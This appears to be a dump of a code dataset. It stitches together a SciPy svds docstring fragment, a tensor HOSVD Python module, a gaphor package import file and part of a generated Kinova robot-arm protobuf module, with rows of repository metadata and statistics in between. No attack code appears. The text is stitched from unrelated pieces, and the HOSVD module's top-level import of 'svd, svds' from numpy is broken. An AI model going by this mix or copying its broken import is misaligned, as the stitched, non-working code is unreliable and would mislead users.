    Compute the largest or smallest `k` singular values and corresponding
    singular vectors of a sparse matrix `A`. The order in which the singular
    values are returned is not guaranteed.

    In the descriptions below, let ``M, N = A.shape``.

    Parameters
    ----------
    A : sparse matrix or LinearOperator
        Matrix to decompose. If `A` is a ``LinearOperator``
        object, it must define both ``matvec`` and ``rmatvec`` methods.
    k : int, default: 6
        Number of singular values and singular vectors to compute.
        Must satisfy ``1 <= k <= min(M, N)``.
    ncv : int, optional
        Ignored.
    tol : float, optional
        The desired relative accuracy for computed singular values.
        Zero (default) means machine precision.
    which : {'LM', 'SM'}
        Which `k` singular values to find: either the largest magnitude ('LM')
        or smallest magnitude ('SM') singular values. Note that choosing
        ``which='SM'`` will force the ``irl`` option to be set ``True``.
    v0 : ndarray, optional
        Starting vector for iterations: must be of length ``A.shape[0]``.
        If not specified, PROPACK will generate a starting vector.
    maxiter : int, optional
        Maximum number of iterations / maximal dimension of the Krylov
        subspace. Default is ``10 * k``.
    return_singular_vectors : {True, False, "u", "vh"}
        Singular values are always computed and returned; this parameter
        controls the computation and return of singular vectors.

        - ``True``: return singular vectors.
        - ``False``: do not return singular vectors.
        - ``"u"``: compute only the left singular vectors; return ``None`` for
          the right singular vectors.
        - ``"vh"``: compute only the right singular vectors; return ``None``
          for the left singular vectors.

    solver : {'arpack', 'propack', 'lobpcg'}, optional
        This is the solver-specific documentation for ``solver='propack'``.
        :ref:`'arpack' <sparse.linalg.svds-arpack>` and
        :ref:`'lobpcg' <sparse.linalg.svds-lobpcg>`
        are also supported.
    random_state : {None, int, `numpy.random.Generator`,
                    `numpy.random.RandomState`}, optional
        Pseudorandom number generator state used to generate resamples.
        If `random_state` is ``None`` (or `np.random`), the
        `numpy.random.RandomState` singleton is used.
        If `random_state` is an int, a new ``RandomState`` instance is used,
        seeded with `random_state`.
        If `random_state` is already a ``Generator`` or ``RandomState``
        instance then that instance is used.
    options : dict, optional
        A dictionary of solver-specific options. No solver-specific options
        are currently supported; this parameter is reserved for future use.

    Returns
    -------
    u : ndarray, shape=(M, k)
        Unitary matrix having left singular vectors as columns.
    s : ndarray, shape=(k,)
        The singular values.
    vh : ndarray, shape=(k, N)
        Unitary matrix having right singular vectors as rows.

    Notes
    -----
    This is an interface to the Fortran library PROPACK [1]_.
    The current default is to run with IRL mode disabled unless seeking the
    smallest singular values/vectors (``which='SM'``).

    References
    ----------
    .. [1] Larsen, Rasmus Munk. "PROPACK-Software for large and sparse SVD
       calculations." Available online. URL
       http://sun.stanford.edu/~rmunk/PROPACK (2004): 2008-2009.

    Examples
    --------
    Construct a matrix ``A`` from singular values and vectors.

    >>> from scipy.stats import ortho_group
    >>> from scipy.sparse import csc_matrix, diags
    >>> from scipy.sparse.linalg import svds
    >>> rng = np.random.default_rng()
    >>> orthogonal = csc_matrix(ortho_group.rvs(10, random_state=rng))
    >>> s = [0.0001, 0.001, 3, 4, 5]  # singular values
    >>> u = orthogonal[:, :5]         # left singular vectors
    >>> vT = orthogonal[:, 5:].T      # right singular vectors
    >>> A = u @ diags(s) @ vT

    With only three singular values/vectors, the SVD approximates the original
    matrix.

    >>> u2, s2, vT2 = svds(A, k=3, solver='propack')
    >>> A2 = u2 @ np.diag(s2) @ vT2
    >>> np.allclose(A2, A.todense(), atol=1e-3)
    True

    With all five singular values/vectors, we can reproduce the original
    matrix.

    >>> u3, s3, vT3 = svds(A, k=5, solver='propack')
    >>> A3 = u3 @ np.diag(s3) @ vT3
    >>> np.allclose(A3, A.todense())
    True

    The singular values match the expected singular values, and the singular
    vectors are as expected up to a difference in sign.

    >>> (np.allclose(s3, s) and
    ...  np.allclose(np.abs(u3), np.abs(u.todense())) and
    ...  np.allclose(np.abs(vT3), np.abs(vT.todense())))
    True

    The singular vectors are also orthogonal.

    >>> (np.allclose(u3.T @ u3, np.eye(5)) and
    ...  np.allclose(vT3 @ vT3.T, np.eye(5)))
    True
    """
    pass
| 39.296203
| 79
| 0.620023
| 2,040
| 15,522
| 4.689216
| 0.126471
| 0.086243
| 0.026343
| 0.014112
| 0.894522
| 0.894522
| 0.874451
| 0.862534
| 0.855425
| 0.855425
| 0
| 0.015941
| 0.260405
| 15,522
| 394
| 80
| 39.395939
| 0.817334
| 0.876884
| 0
| 0.5
| 0
| 0
| 0.040323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
b657bd62d644cb56e0af5f8325edb1dd479f9141
| 1,013
|
py
|
Python
|
HOSVD.py
|
mertall/Facial-Recognition
|
c80ca3b69500e701ca95d5c3f34335105d3c55cb
|
[
"BSD-3-Clause"
] | null | null | null |
HOSVD.py
|
mertall/Facial-Recognition
|
c80ca3b69500e701ca95d5c3f34335105d3c55cb
|
[
"BSD-3-Clause"
] | 1
|
2021-05-27T19:27:40.000Z
|
2021-11-16T14:41:00.000Z
|
HOSVD.py
|
mertall/Facial-Recognition
|
c80ca3b69500e701ca95d5c3f34335105d3c55cb
|
[
"BSD-3-Clause"
] | 8
|
2020-11-03T15:50:21.000Z
|
2022-02-10T02:59:22.000Z
|
#Cornell Summer School Charles F. Van Loan
import numpy
from numpy import svd, svds
def dense(A):
    """Higher-order SVD (HOSVD / Tucker decomposition) of a dense tensor.

    For an ``n(1) x ... x n(d)`` tensor ``A``, compute for each mode ``k``
    the left singular vectors ``U[k]`` of the mode-k unfolding of ``A``, and
    the core tensor ``S = A x1 U[0]^H x2 U[1]^H ... xd U[d-1]^H``.

    Parameters
    ----------
    A : array_like
        The input tensor, ``d``-dimensional.

    Returns
    -------
    S : numpy.ndarray
        Core tensor, same number of dimensions as `A`.
    U : list of numpy.ndarray
        ``U[k]`` holds (as columns) the left singular vectors of the mode-k
        unfolding of `A`.  With ``full_matrices=False`` each factor is
        square whenever mode ``k`` is the short dimension of its unfolding,
        so ``A`` can be reconstructed exactly as ``S x1 U[0] ... xd U[d-1]``.
    """
    A = numpy.asarray(A)
    S = A
    U = []
    for k in range(A.ndim):
        # Mode-k unfolding: bring axis k to the front, flatten the rest.
        C = numpy.moveaxis(A, k, 0).reshape(A.shape[k], -1)
        U_k, _, _ = numpy.linalg.svd(C, full_matrices=False)
        U.append(U_k)
        # Mode-k product S x_k U_k^H: contract axis k of S against the rows
        # of U_k^H, then move the resulting axis back into position k.
        S = numpy.moveaxis(numpy.tensordot(U_k.conj().T, S, axes=(1, k)),
                           0, k)
    return S, U
def sparse(A, k=6):
    """Truncated higher-order SVD of a tensor using an iterative sparse SVD.

    Same decomposition as :func:`dense`, but each mode's factor is computed
    with ``scipy.sparse.linalg.svds``, keeping only the leading singular
    vectors of every mode-k unfolding.

    Parameters
    ----------
    A : array_like
        The input tensor, ``d``-dimensional.
    k : int, default: 6
        Number of singular vectors to keep per mode (6 matches the ``svds``
        default the original code relied on).  Internally clamped to the
        valid ARPACK range ``1 <= k < min(unfolding.shape)``.

    Returns
    -------
    S : numpy.ndarray
        Truncated core tensor.
    U : list of numpy.ndarray
        ``U[m]`` holds (as columns, largest singular value first) the leading
        left singular vectors of the mode-m unfolding of `A`.
    """
    from scipy.sparse.linalg import svds

    A = numpy.asarray(A)
    S = A
    U = []
    for mode in range(A.ndim):
        # Mode-m unfolding of the *original* tensor A.
        C = numpy.moveaxis(A, mode, 0).reshape(A.shape[mode], -1)
        # svds (ARPACK) requires 1 <= k < min(C.shape).
        keff = max(1, min(k, min(C.shape) - 1))
        U_m, _, _ = svds(C, k=keff)
        # svds returns singular values in ascending order; flip the columns
        # so the dominant singular vector comes first.
        U_m = U_m[:, ::-1]
        U.append(U_m)
        # Truncated mode-m product S x_m U_m^H.
        S = numpy.moveaxis(numpy.tensordot(U_m.conj().T, S, axes=(1, mode)),
                           0, mode)
    return S, U
| 34.931034
| 91
| 0.573544
| 202
| 1,013
| 2.816832
| 0.29703
| 0.02109
| 0.02812
| 0.035149
| 0.84007
| 0.84007
| 0.84007
| 0.84007
| 0.84007
| 0.84007
| 0
| 0.016304
| 0.273445
| 1,013
| 29
| 92
| 34.931034
| 0.756793
| 0.502468
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.111111
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b666eb8724588ad4e1146a0748748f3ade6dc66d
| 190
|
py
|
Python
|
gaphor/C4Model/diagramitems/__init__.py
|
MartinIIOT/gaphor
|
b08bf6ddb8c92ec87fccabc2ddee697609f73e67
|
[
"Apache-2.0"
] | 867
|
2018-01-09T00:19:09.000Z
|
2022-03-31T02:49:23.000Z
|
gaphor/C4Model/diagramitems/__init__.py
|
burakozturk16/gaphor
|
86267a5200ac4439626d35d306dbb376c3800107
|
[
"Apache-2.0"
] | 790
|
2018-01-13T23:47:07.000Z
|
2022-03-31T16:04:27.000Z
|
gaphor/C4Model/diagramitems/__init__.py
|
burakozturk16/gaphor
|
86267a5200ac4439626d35d306dbb376c3800107
|
[
"Apache-2.0"
] | 117
|
2018-01-09T02:24:49.000Z
|
2022-03-23T08:07:42.000Z
|
from gaphor.C4Model.diagramitems.container import C4ContainerItem
from gaphor.C4Model.diagramitems.database import C4DatabaseItem
from gaphor.C4Model.diagramitems.person import C4PersonItem
| 47.5
| 65
| 0.889474
| 21
| 190
| 8.047619
| 0.52381
| 0.177515
| 0.301775
| 0.514793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033708
| 0.063158
| 190
| 3
| 66
| 63.333333
| 0.91573
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b69970f5b0439e19de6da61a5972e097828245db
| 51,781
|
py
|
Python
|
kortex_api/autogen/messages/BaseCyclic_pb2.py
|
vislab-tecnico-lisboa/ros_kortex
|
870a625021631b1d3422c3818aa7a8ce0723d99d
|
[
"BSD-3-Clause"
] | 1
|
2020-12-22T17:37:40.000Z
|
2020-12-22T17:37:40.000Z
|
kortex_api/autogen/messages/BaseCyclic_pb2.py
|
vislab-tecnico-lisboa/ros_kortex
|
870a625021631b1d3422c3818aa7a8ce0723d99d
|
[
"BSD-3-Clause"
] | null | null | null |
kortex_api/autogen/messages/BaseCyclic_pb2.py
|
vislab-tecnico-lisboa/ros_kortex
|
870a625021631b1d3422c3818aa7a8ce0723d99d
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: BaseCyclic.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from . import Common_pb2 as Common__pb2
from . import InterconnectCyclicMessage_pb2 as InterconnectCyclicMessage__pb2
# Different protoc versions expose imported-dependency modules under two
# attribute spellings ("Common__pb2" vs "Common_pb2"); probe the
# double-underscore form first and fall back to the single-underscore one.
try:
  Common__pb2 = InterconnectCyclicMessage__pb2.Common__pb2
except AttributeError:
  Common__pb2 = InterconnectCyclicMessage__pb2.Common_pb2
try:
  GripperCyclicMessage__pb2 = InterconnectCyclicMessage__pb2.GripperCyclicMessage__pb2
except AttributeError:
  GripperCyclicMessage__pb2 = InterconnectCyclicMessage__pb2.GripperCyclicMessage_pb2
# NOTE(review): the block below repeats the Common__pb2 probe above verbatim;
# redundant but harmless, and this file is generated ("DO NOT EDIT"), so the
# duplication should be fixed in the generator inputs, not by hand.
try:
  Common__pb2 = InterconnectCyclicMessage__pb2.Common__pb2
except AttributeError:
  Common__pb2 = InterconnectCyclicMessage__pb2.Common_pb2
from .Common_pb2 import *
from .InterconnectCyclicMessage_pb2 import *
DESCRIPTOR = _descriptor.FileDescriptor(
name='BaseCyclic.proto',
package='Kinova.Api.BaseCyclic',
syntax='proto3',
serialized_pb=_b('\n\x10\x42\x61seCyclic.proto\x12\x15Kinova.Api.BaseCyclic\x1a\x0c\x43ommon.proto\x1a\x1fInterconnectCyclicMessage.proto\"\x85\x01\n\x0f\x41\x63tuatorCommand\x12\x12\n\ncommand_id\x18\x01 \x01(\x07\x12\r\n\x05\x66lags\x18\x02 \x01(\x07\x12\x10\n\x08position\x18\x03 \x01(\x02\x12\x10\n\x08velocity\x18\x04 \x01(\x02\x12\x14\n\x0ctorque_joint\x18\x05 \x01(\x02\x12\x15\n\rcurrent_motor\x18\x06 \x01(\x02\"\xbe\x02\n\x10\x41\x63tuatorFeedback\x12\x12\n\ncommand_id\x18\x01 \x01(\x07\x12\x14\n\x0cstatus_flags\x18\x02 \x01(\x07\x12\x13\n\x0bjitter_comm\x18\x03 \x01(\x07\x12\x10\n\x08position\x18\x04 \x01(\x02\x12\x10\n\x08velocity\x18\x05 \x01(\x02\x12\x0e\n\x06torque\x18\x06 \x01(\x02\x12\x15\n\rcurrent_motor\x18\x07 \x01(\x02\x12\x0f\n\x07voltage\x18\x08 \x01(\x02\x12\x19\n\x11temperature_motor\x18\t \x01(\x02\x12\x18\n\x10temperature_core\x18\n \x01(\x02\x12\x14\n\x0c\x66\x61ult_bank_a\x18\x0b \x01(\x07\x12\x14\n\x0c\x66\x61ult_bank_b\x18\x0c \x01(\x07\x12\x16\n\x0ewarning_bank_a\x18\r \x01(\x07\x12\x16\n\x0ewarning_bank_b\x18\x0e \x01(\x07\"\x9e\x03\n\x12\x41\x63tuatorCustomData\x12\x12\n\ncommand_id\x18\x01 \x01(\x07\x12\x15\n\rcustom_data_0\x18\x02 \x01(\x07\x12\x15\n\rcustom_data_1\x18\x03 \x01(\x07\x12\x15\n\rcustom_data_2\x18\x04 \x01(\x07\x12\x15\n\rcustom_data_3\x18\x05 \x01(\x07\x12\x15\n\rcustom_data_4\x18\x06 \x01(\x07\x12\x15\n\rcustom_data_5\x18\x07 \x01(\x07\x12\x15\n\rcustom_data_6\x18\x08 \x01(\x07\x12\x15\n\rcustom_data_7\x18\t \x01(\x07\x12\x15\n\rcustom_data_8\x18\n \x01(\x07\x12\x15\n\rcustom_data_9\x18\x0b \x01(\x07\x12\x16\n\x0e\x63ustom_data_10\x18\x0c \x01(\x07\x12\x16\n\x0e\x63ustom_data_11\x18\r \x01(\x07\x12\x16\n\x0e\x63ustom_data_12\x18\x0e \x01(\x07\x12\x16\n\x0e\x63ustom_data_13\x18\x0f \x01(\x07\x12\x16\n\x0e\x63ustom_data_14\x18\x10 \x01(\x07\x12\x16\n\x0e\x63ustom_data_15\x18\x11 \x01(\x07\"\xd1\t\n\x0c\x42\x61seFeedback\x12*\n\"active_state_connection_identifier\x18\x01 \x01(\r\x12\x31\n\x0c\x61\x63tive_state\x18\x02 
\x01(\x0e\x32\x1b.Kinova.Api.Common.ArmState\x12\x13\n\x0b\x61rm_voltage\x18\x03 \x01(\x02\x12\x13\n\x0b\x61rm_current\x18\x04 \x01(\x02\x12\x17\n\x0ftemperature_cpu\x18\x05 \x01(\x02\x12\x1b\n\x13temperature_ambient\x18\x06 \x01(\x02\x12\x1a\n\x12imu_acceleration_x\x18\x07 \x01(\x02\x12\x1a\n\x12imu_acceleration_y\x18\x08 \x01(\x02\x12\x1a\n\x12imu_acceleration_z\x18\t \x01(\x02\x12\x1e\n\x16imu_angular_velocity_x\x18\n \x01(\x02\x12\x1e\n\x16imu_angular_velocity_y\x18\x0b \x01(\x02\x12\x1e\n\x16imu_angular_velocity_z\x18\x0c \x01(\x02\x12\x13\n\x0btool_pose_x\x18\r \x01(\x02\x12\x13\n\x0btool_pose_y\x18\x0e \x01(\x02\x12\x13\n\x0btool_pose_z\x18\x0f \x01(\x02\x12\x19\n\x11tool_pose_theta_x\x18\x10 \x01(\x02\x12\x19\n\x11tool_pose_theta_y\x18\x11 \x01(\x02\x12\x19\n\x11tool_pose_theta_z\x18\x12 \x01(\x02\x12\x1b\n\x13tool_twist_linear_x\x18\x13 \x01(\x02\x12\x1b\n\x13tool_twist_linear_y\x18\x14 \x01(\x02\x12\x1b\n\x13tool_twist_linear_z\x18\x15 \x01(\x02\x12\x1c\n\x14tool_twist_angular_x\x18\x16 \x01(\x02\x12\x1c\n\x14tool_twist_angular_y\x18\x17 \x01(\x02\x12\x1c\n\x14tool_twist_angular_z\x18\x18 \x01(\x02\x12$\n\x1ctool_external_wrench_force_x\x18\x19 \x01(\x02\x12$\n\x1ctool_external_wrench_force_y\x18\x1a \x01(\x02\x12$\n\x1ctool_external_wrench_force_z\x18\x1b \x01(\x02\x12%\n\x1dtool_external_wrench_torque_x\x18\x1c \x01(\x02\x12%\n\x1dtool_external_wrench_torque_y\x18\x1d \x01(\x02\x12%\n\x1dtool_external_wrench_torque_z\x18\x1e \x01(\x02\x12\x14\n\x0c\x66\x61ult_bank_a\x18\x1f \x01(\x07\x12\x14\n\x0c\x66\x61ult_bank_b\x18 \x01(\x07\x12\x16\n\x0ewarning_bank_a\x18! 
\x01(\x07\x12\x16\n\x0ewarning_bank_b\x18\" \x01(\x07\x12\x1d\n\x15\x63ommanded_tool_pose_x\x18# \x01(\x02\x12\x1d\n\x15\x63ommanded_tool_pose_y\x18$ \x01(\x02\x12\x1d\n\x15\x63ommanded_tool_pose_z\x18% \x01(\x02\x12#\n\x1b\x63ommanded_tool_pose_theta_x\x18& \x01(\x02\x12#\n\x1b\x63ommanded_tool_pose_theta_y\x18\' \x01(\x02\x12#\n\x1b\x63ommanded_tool_pose_theta_z\x18( \x01(\x02\"\xed\x02\n\nCustomData\x12\x10\n\x08\x66rame_id\x18\x01 \x01(\x07\x12\x15\n\rcustom_data_0\x18\x02 \x01(\x07\x12\x15\n\rcustom_data_1\x18\x03 \x01(\x07\x12\x15\n\rcustom_data_2\x18\x04 \x01(\x07\x12\x15\n\rcustom_data_3\x18\x05 \x01(\x07\x12\x15\n\rcustom_data_4\x18\x06 \x01(\x07\x12\x15\n\rcustom_data_5\x18\x07 \x01(\x07\x12\x15\n\rcustom_data_6\x18\x08 \x01(\x07\x12\x15\n\rcustom_data_7\x18\t \x01(\x07\x12H\n\x15\x61\x63tuators_custom_data\x18\n \x03(\x0b\x32).Kinova.Api.BaseCyclic.ActuatorCustomData\x12K\n\x18interconnect_custom_data\x18\x0b \x01(\x0b\x32).Kinova.Api.InterconnectCyclic.CustomData\"\x94\x01\n\x07\x43ommand\x12\x10\n\x08\x66rame_id\x18\x01 \x01(\x07\x12\x39\n\tactuators\x18\x02 \x03(\x0b\x32&.Kinova.Api.BaseCyclic.ActuatorCommand\x12<\n\x0cinterconnect\x18\x03 \x01(\x0b\x32&.Kinova.Api.InterconnectCyclic.Command\"\xca\x01\n\x08\x46\x65\x65\x64\x62\x61\x63k\x12\x10\n\x08\x66rame_id\x18\x01 \x01(\x07\x12\x31\n\x04\x62\x61se\x18\x02 \x01(\x0b\x32#.Kinova.Api.BaseCyclic.BaseFeedback\x12:\n\tactuators\x18\x03 \x03(\x0b\x32\'.Kinova.Api.BaseCyclic.ActuatorFeedback\x12=\n\x0cinterconnect\x18\x04 
\x01(\x0b\x32\'.Kinova.Api.InterconnectCyclic.Feedback*5\n\x0eServiceVersion\x12\x0e\n\nRESERVED_0\x10\x00\x12\x13\n\x0f\x43URRENT_VERSION\x10\x01\x32\xcd\x02\n\nBaseCyclic\x12J\n\x07Refresh\x12\x1e.Kinova.Api.BaseCyclic.Command\x1a\x1f.Kinova.Api.BaseCyclic.Feedback\x12J\n\x0eRefreshCommand\x12\x1e.Kinova.Api.BaseCyclic.Command\x1a\x18.Kinova.Api.Common.Empty\x12L\n\x0fRefreshFeedback\x12\x18.Kinova.Api.Common.Empty\x1a\x1f.Kinova.Api.BaseCyclic.Feedback\x12Y\n\x11RefreshCustomData\x12!.Kinova.Api.BaseCyclic.CustomData\x1a!.Kinova.Api.BaseCyclic.CustomDataP\x00P\x01\x62\x06proto3')
,
dependencies=[Common__pb2.DESCRIPTOR,InterconnectCyclicMessage__pb2.DESCRIPTOR,],
public_dependencies=[Common__pb2.DESCRIPTOR,InterconnectCyclicMessage__pb2.DESCRIPTOR,])
_SERVICEVERSION = _descriptor.EnumDescriptor(
name='ServiceVersion',
full_name='Kinova.Api.BaseCyclic.ServiceVersion',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='RESERVED_0', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CURRENT_VERSION', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=2924,
serialized_end=2977,
)
_sym_db.RegisterEnumDescriptor(_SERVICEVERSION)
ServiceVersion = enum_type_wrapper.EnumTypeWrapper(_SERVICEVERSION)
RESERVED_0 = 0
CURRENT_VERSION = 1
_ACTUATORCOMMAND = _descriptor.Descriptor(
name='ActuatorCommand',
full_name='Kinova.Api.BaseCyclic.ActuatorCommand',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='command_id', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.command_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='flags', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.flags', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='position', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.position', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='velocity', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.velocity', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='torque_joint', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.torque_joint', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='current_motor', full_name='Kinova.Api.BaseCyclic.ActuatorCommand.current_motor', index=5,
number=6, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=91,
serialized_end=224,
)
_ACTUATORFEEDBACK = _descriptor.Descriptor(
name='ActuatorFeedback',
full_name='Kinova.Api.BaseCyclic.ActuatorFeedback',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='command_id', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.command_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status_flags', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.status_flags', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='jitter_comm', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.jitter_comm', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='position', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.position', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='velocity', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.velocity', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='torque', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.torque', index=5,
number=6, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='current_motor', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.current_motor', index=6,
number=7, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='voltage', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.voltage', index=7,
number=8, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='temperature_motor', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.temperature_motor', index=8,
number=9, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='temperature_core', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.temperature_core', index=9,
number=10, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fault_bank_a', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.fault_bank_a', index=10,
number=11, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fault_bank_b', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.fault_bank_b', index=11,
number=12, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='warning_bank_a', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.warning_bank_a', index=12,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='warning_bank_b', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.warning_bank_b', index=13,
number=14, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=227,
serialized_end=545,
)
_ACTUATORCUSTOMDATA = _descriptor.Descriptor(
name='ActuatorCustomData',
full_name='Kinova.Api.BaseCyclic.ActuatorCustomData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='command_id', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.command_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_0', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_0', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_1', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_1', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
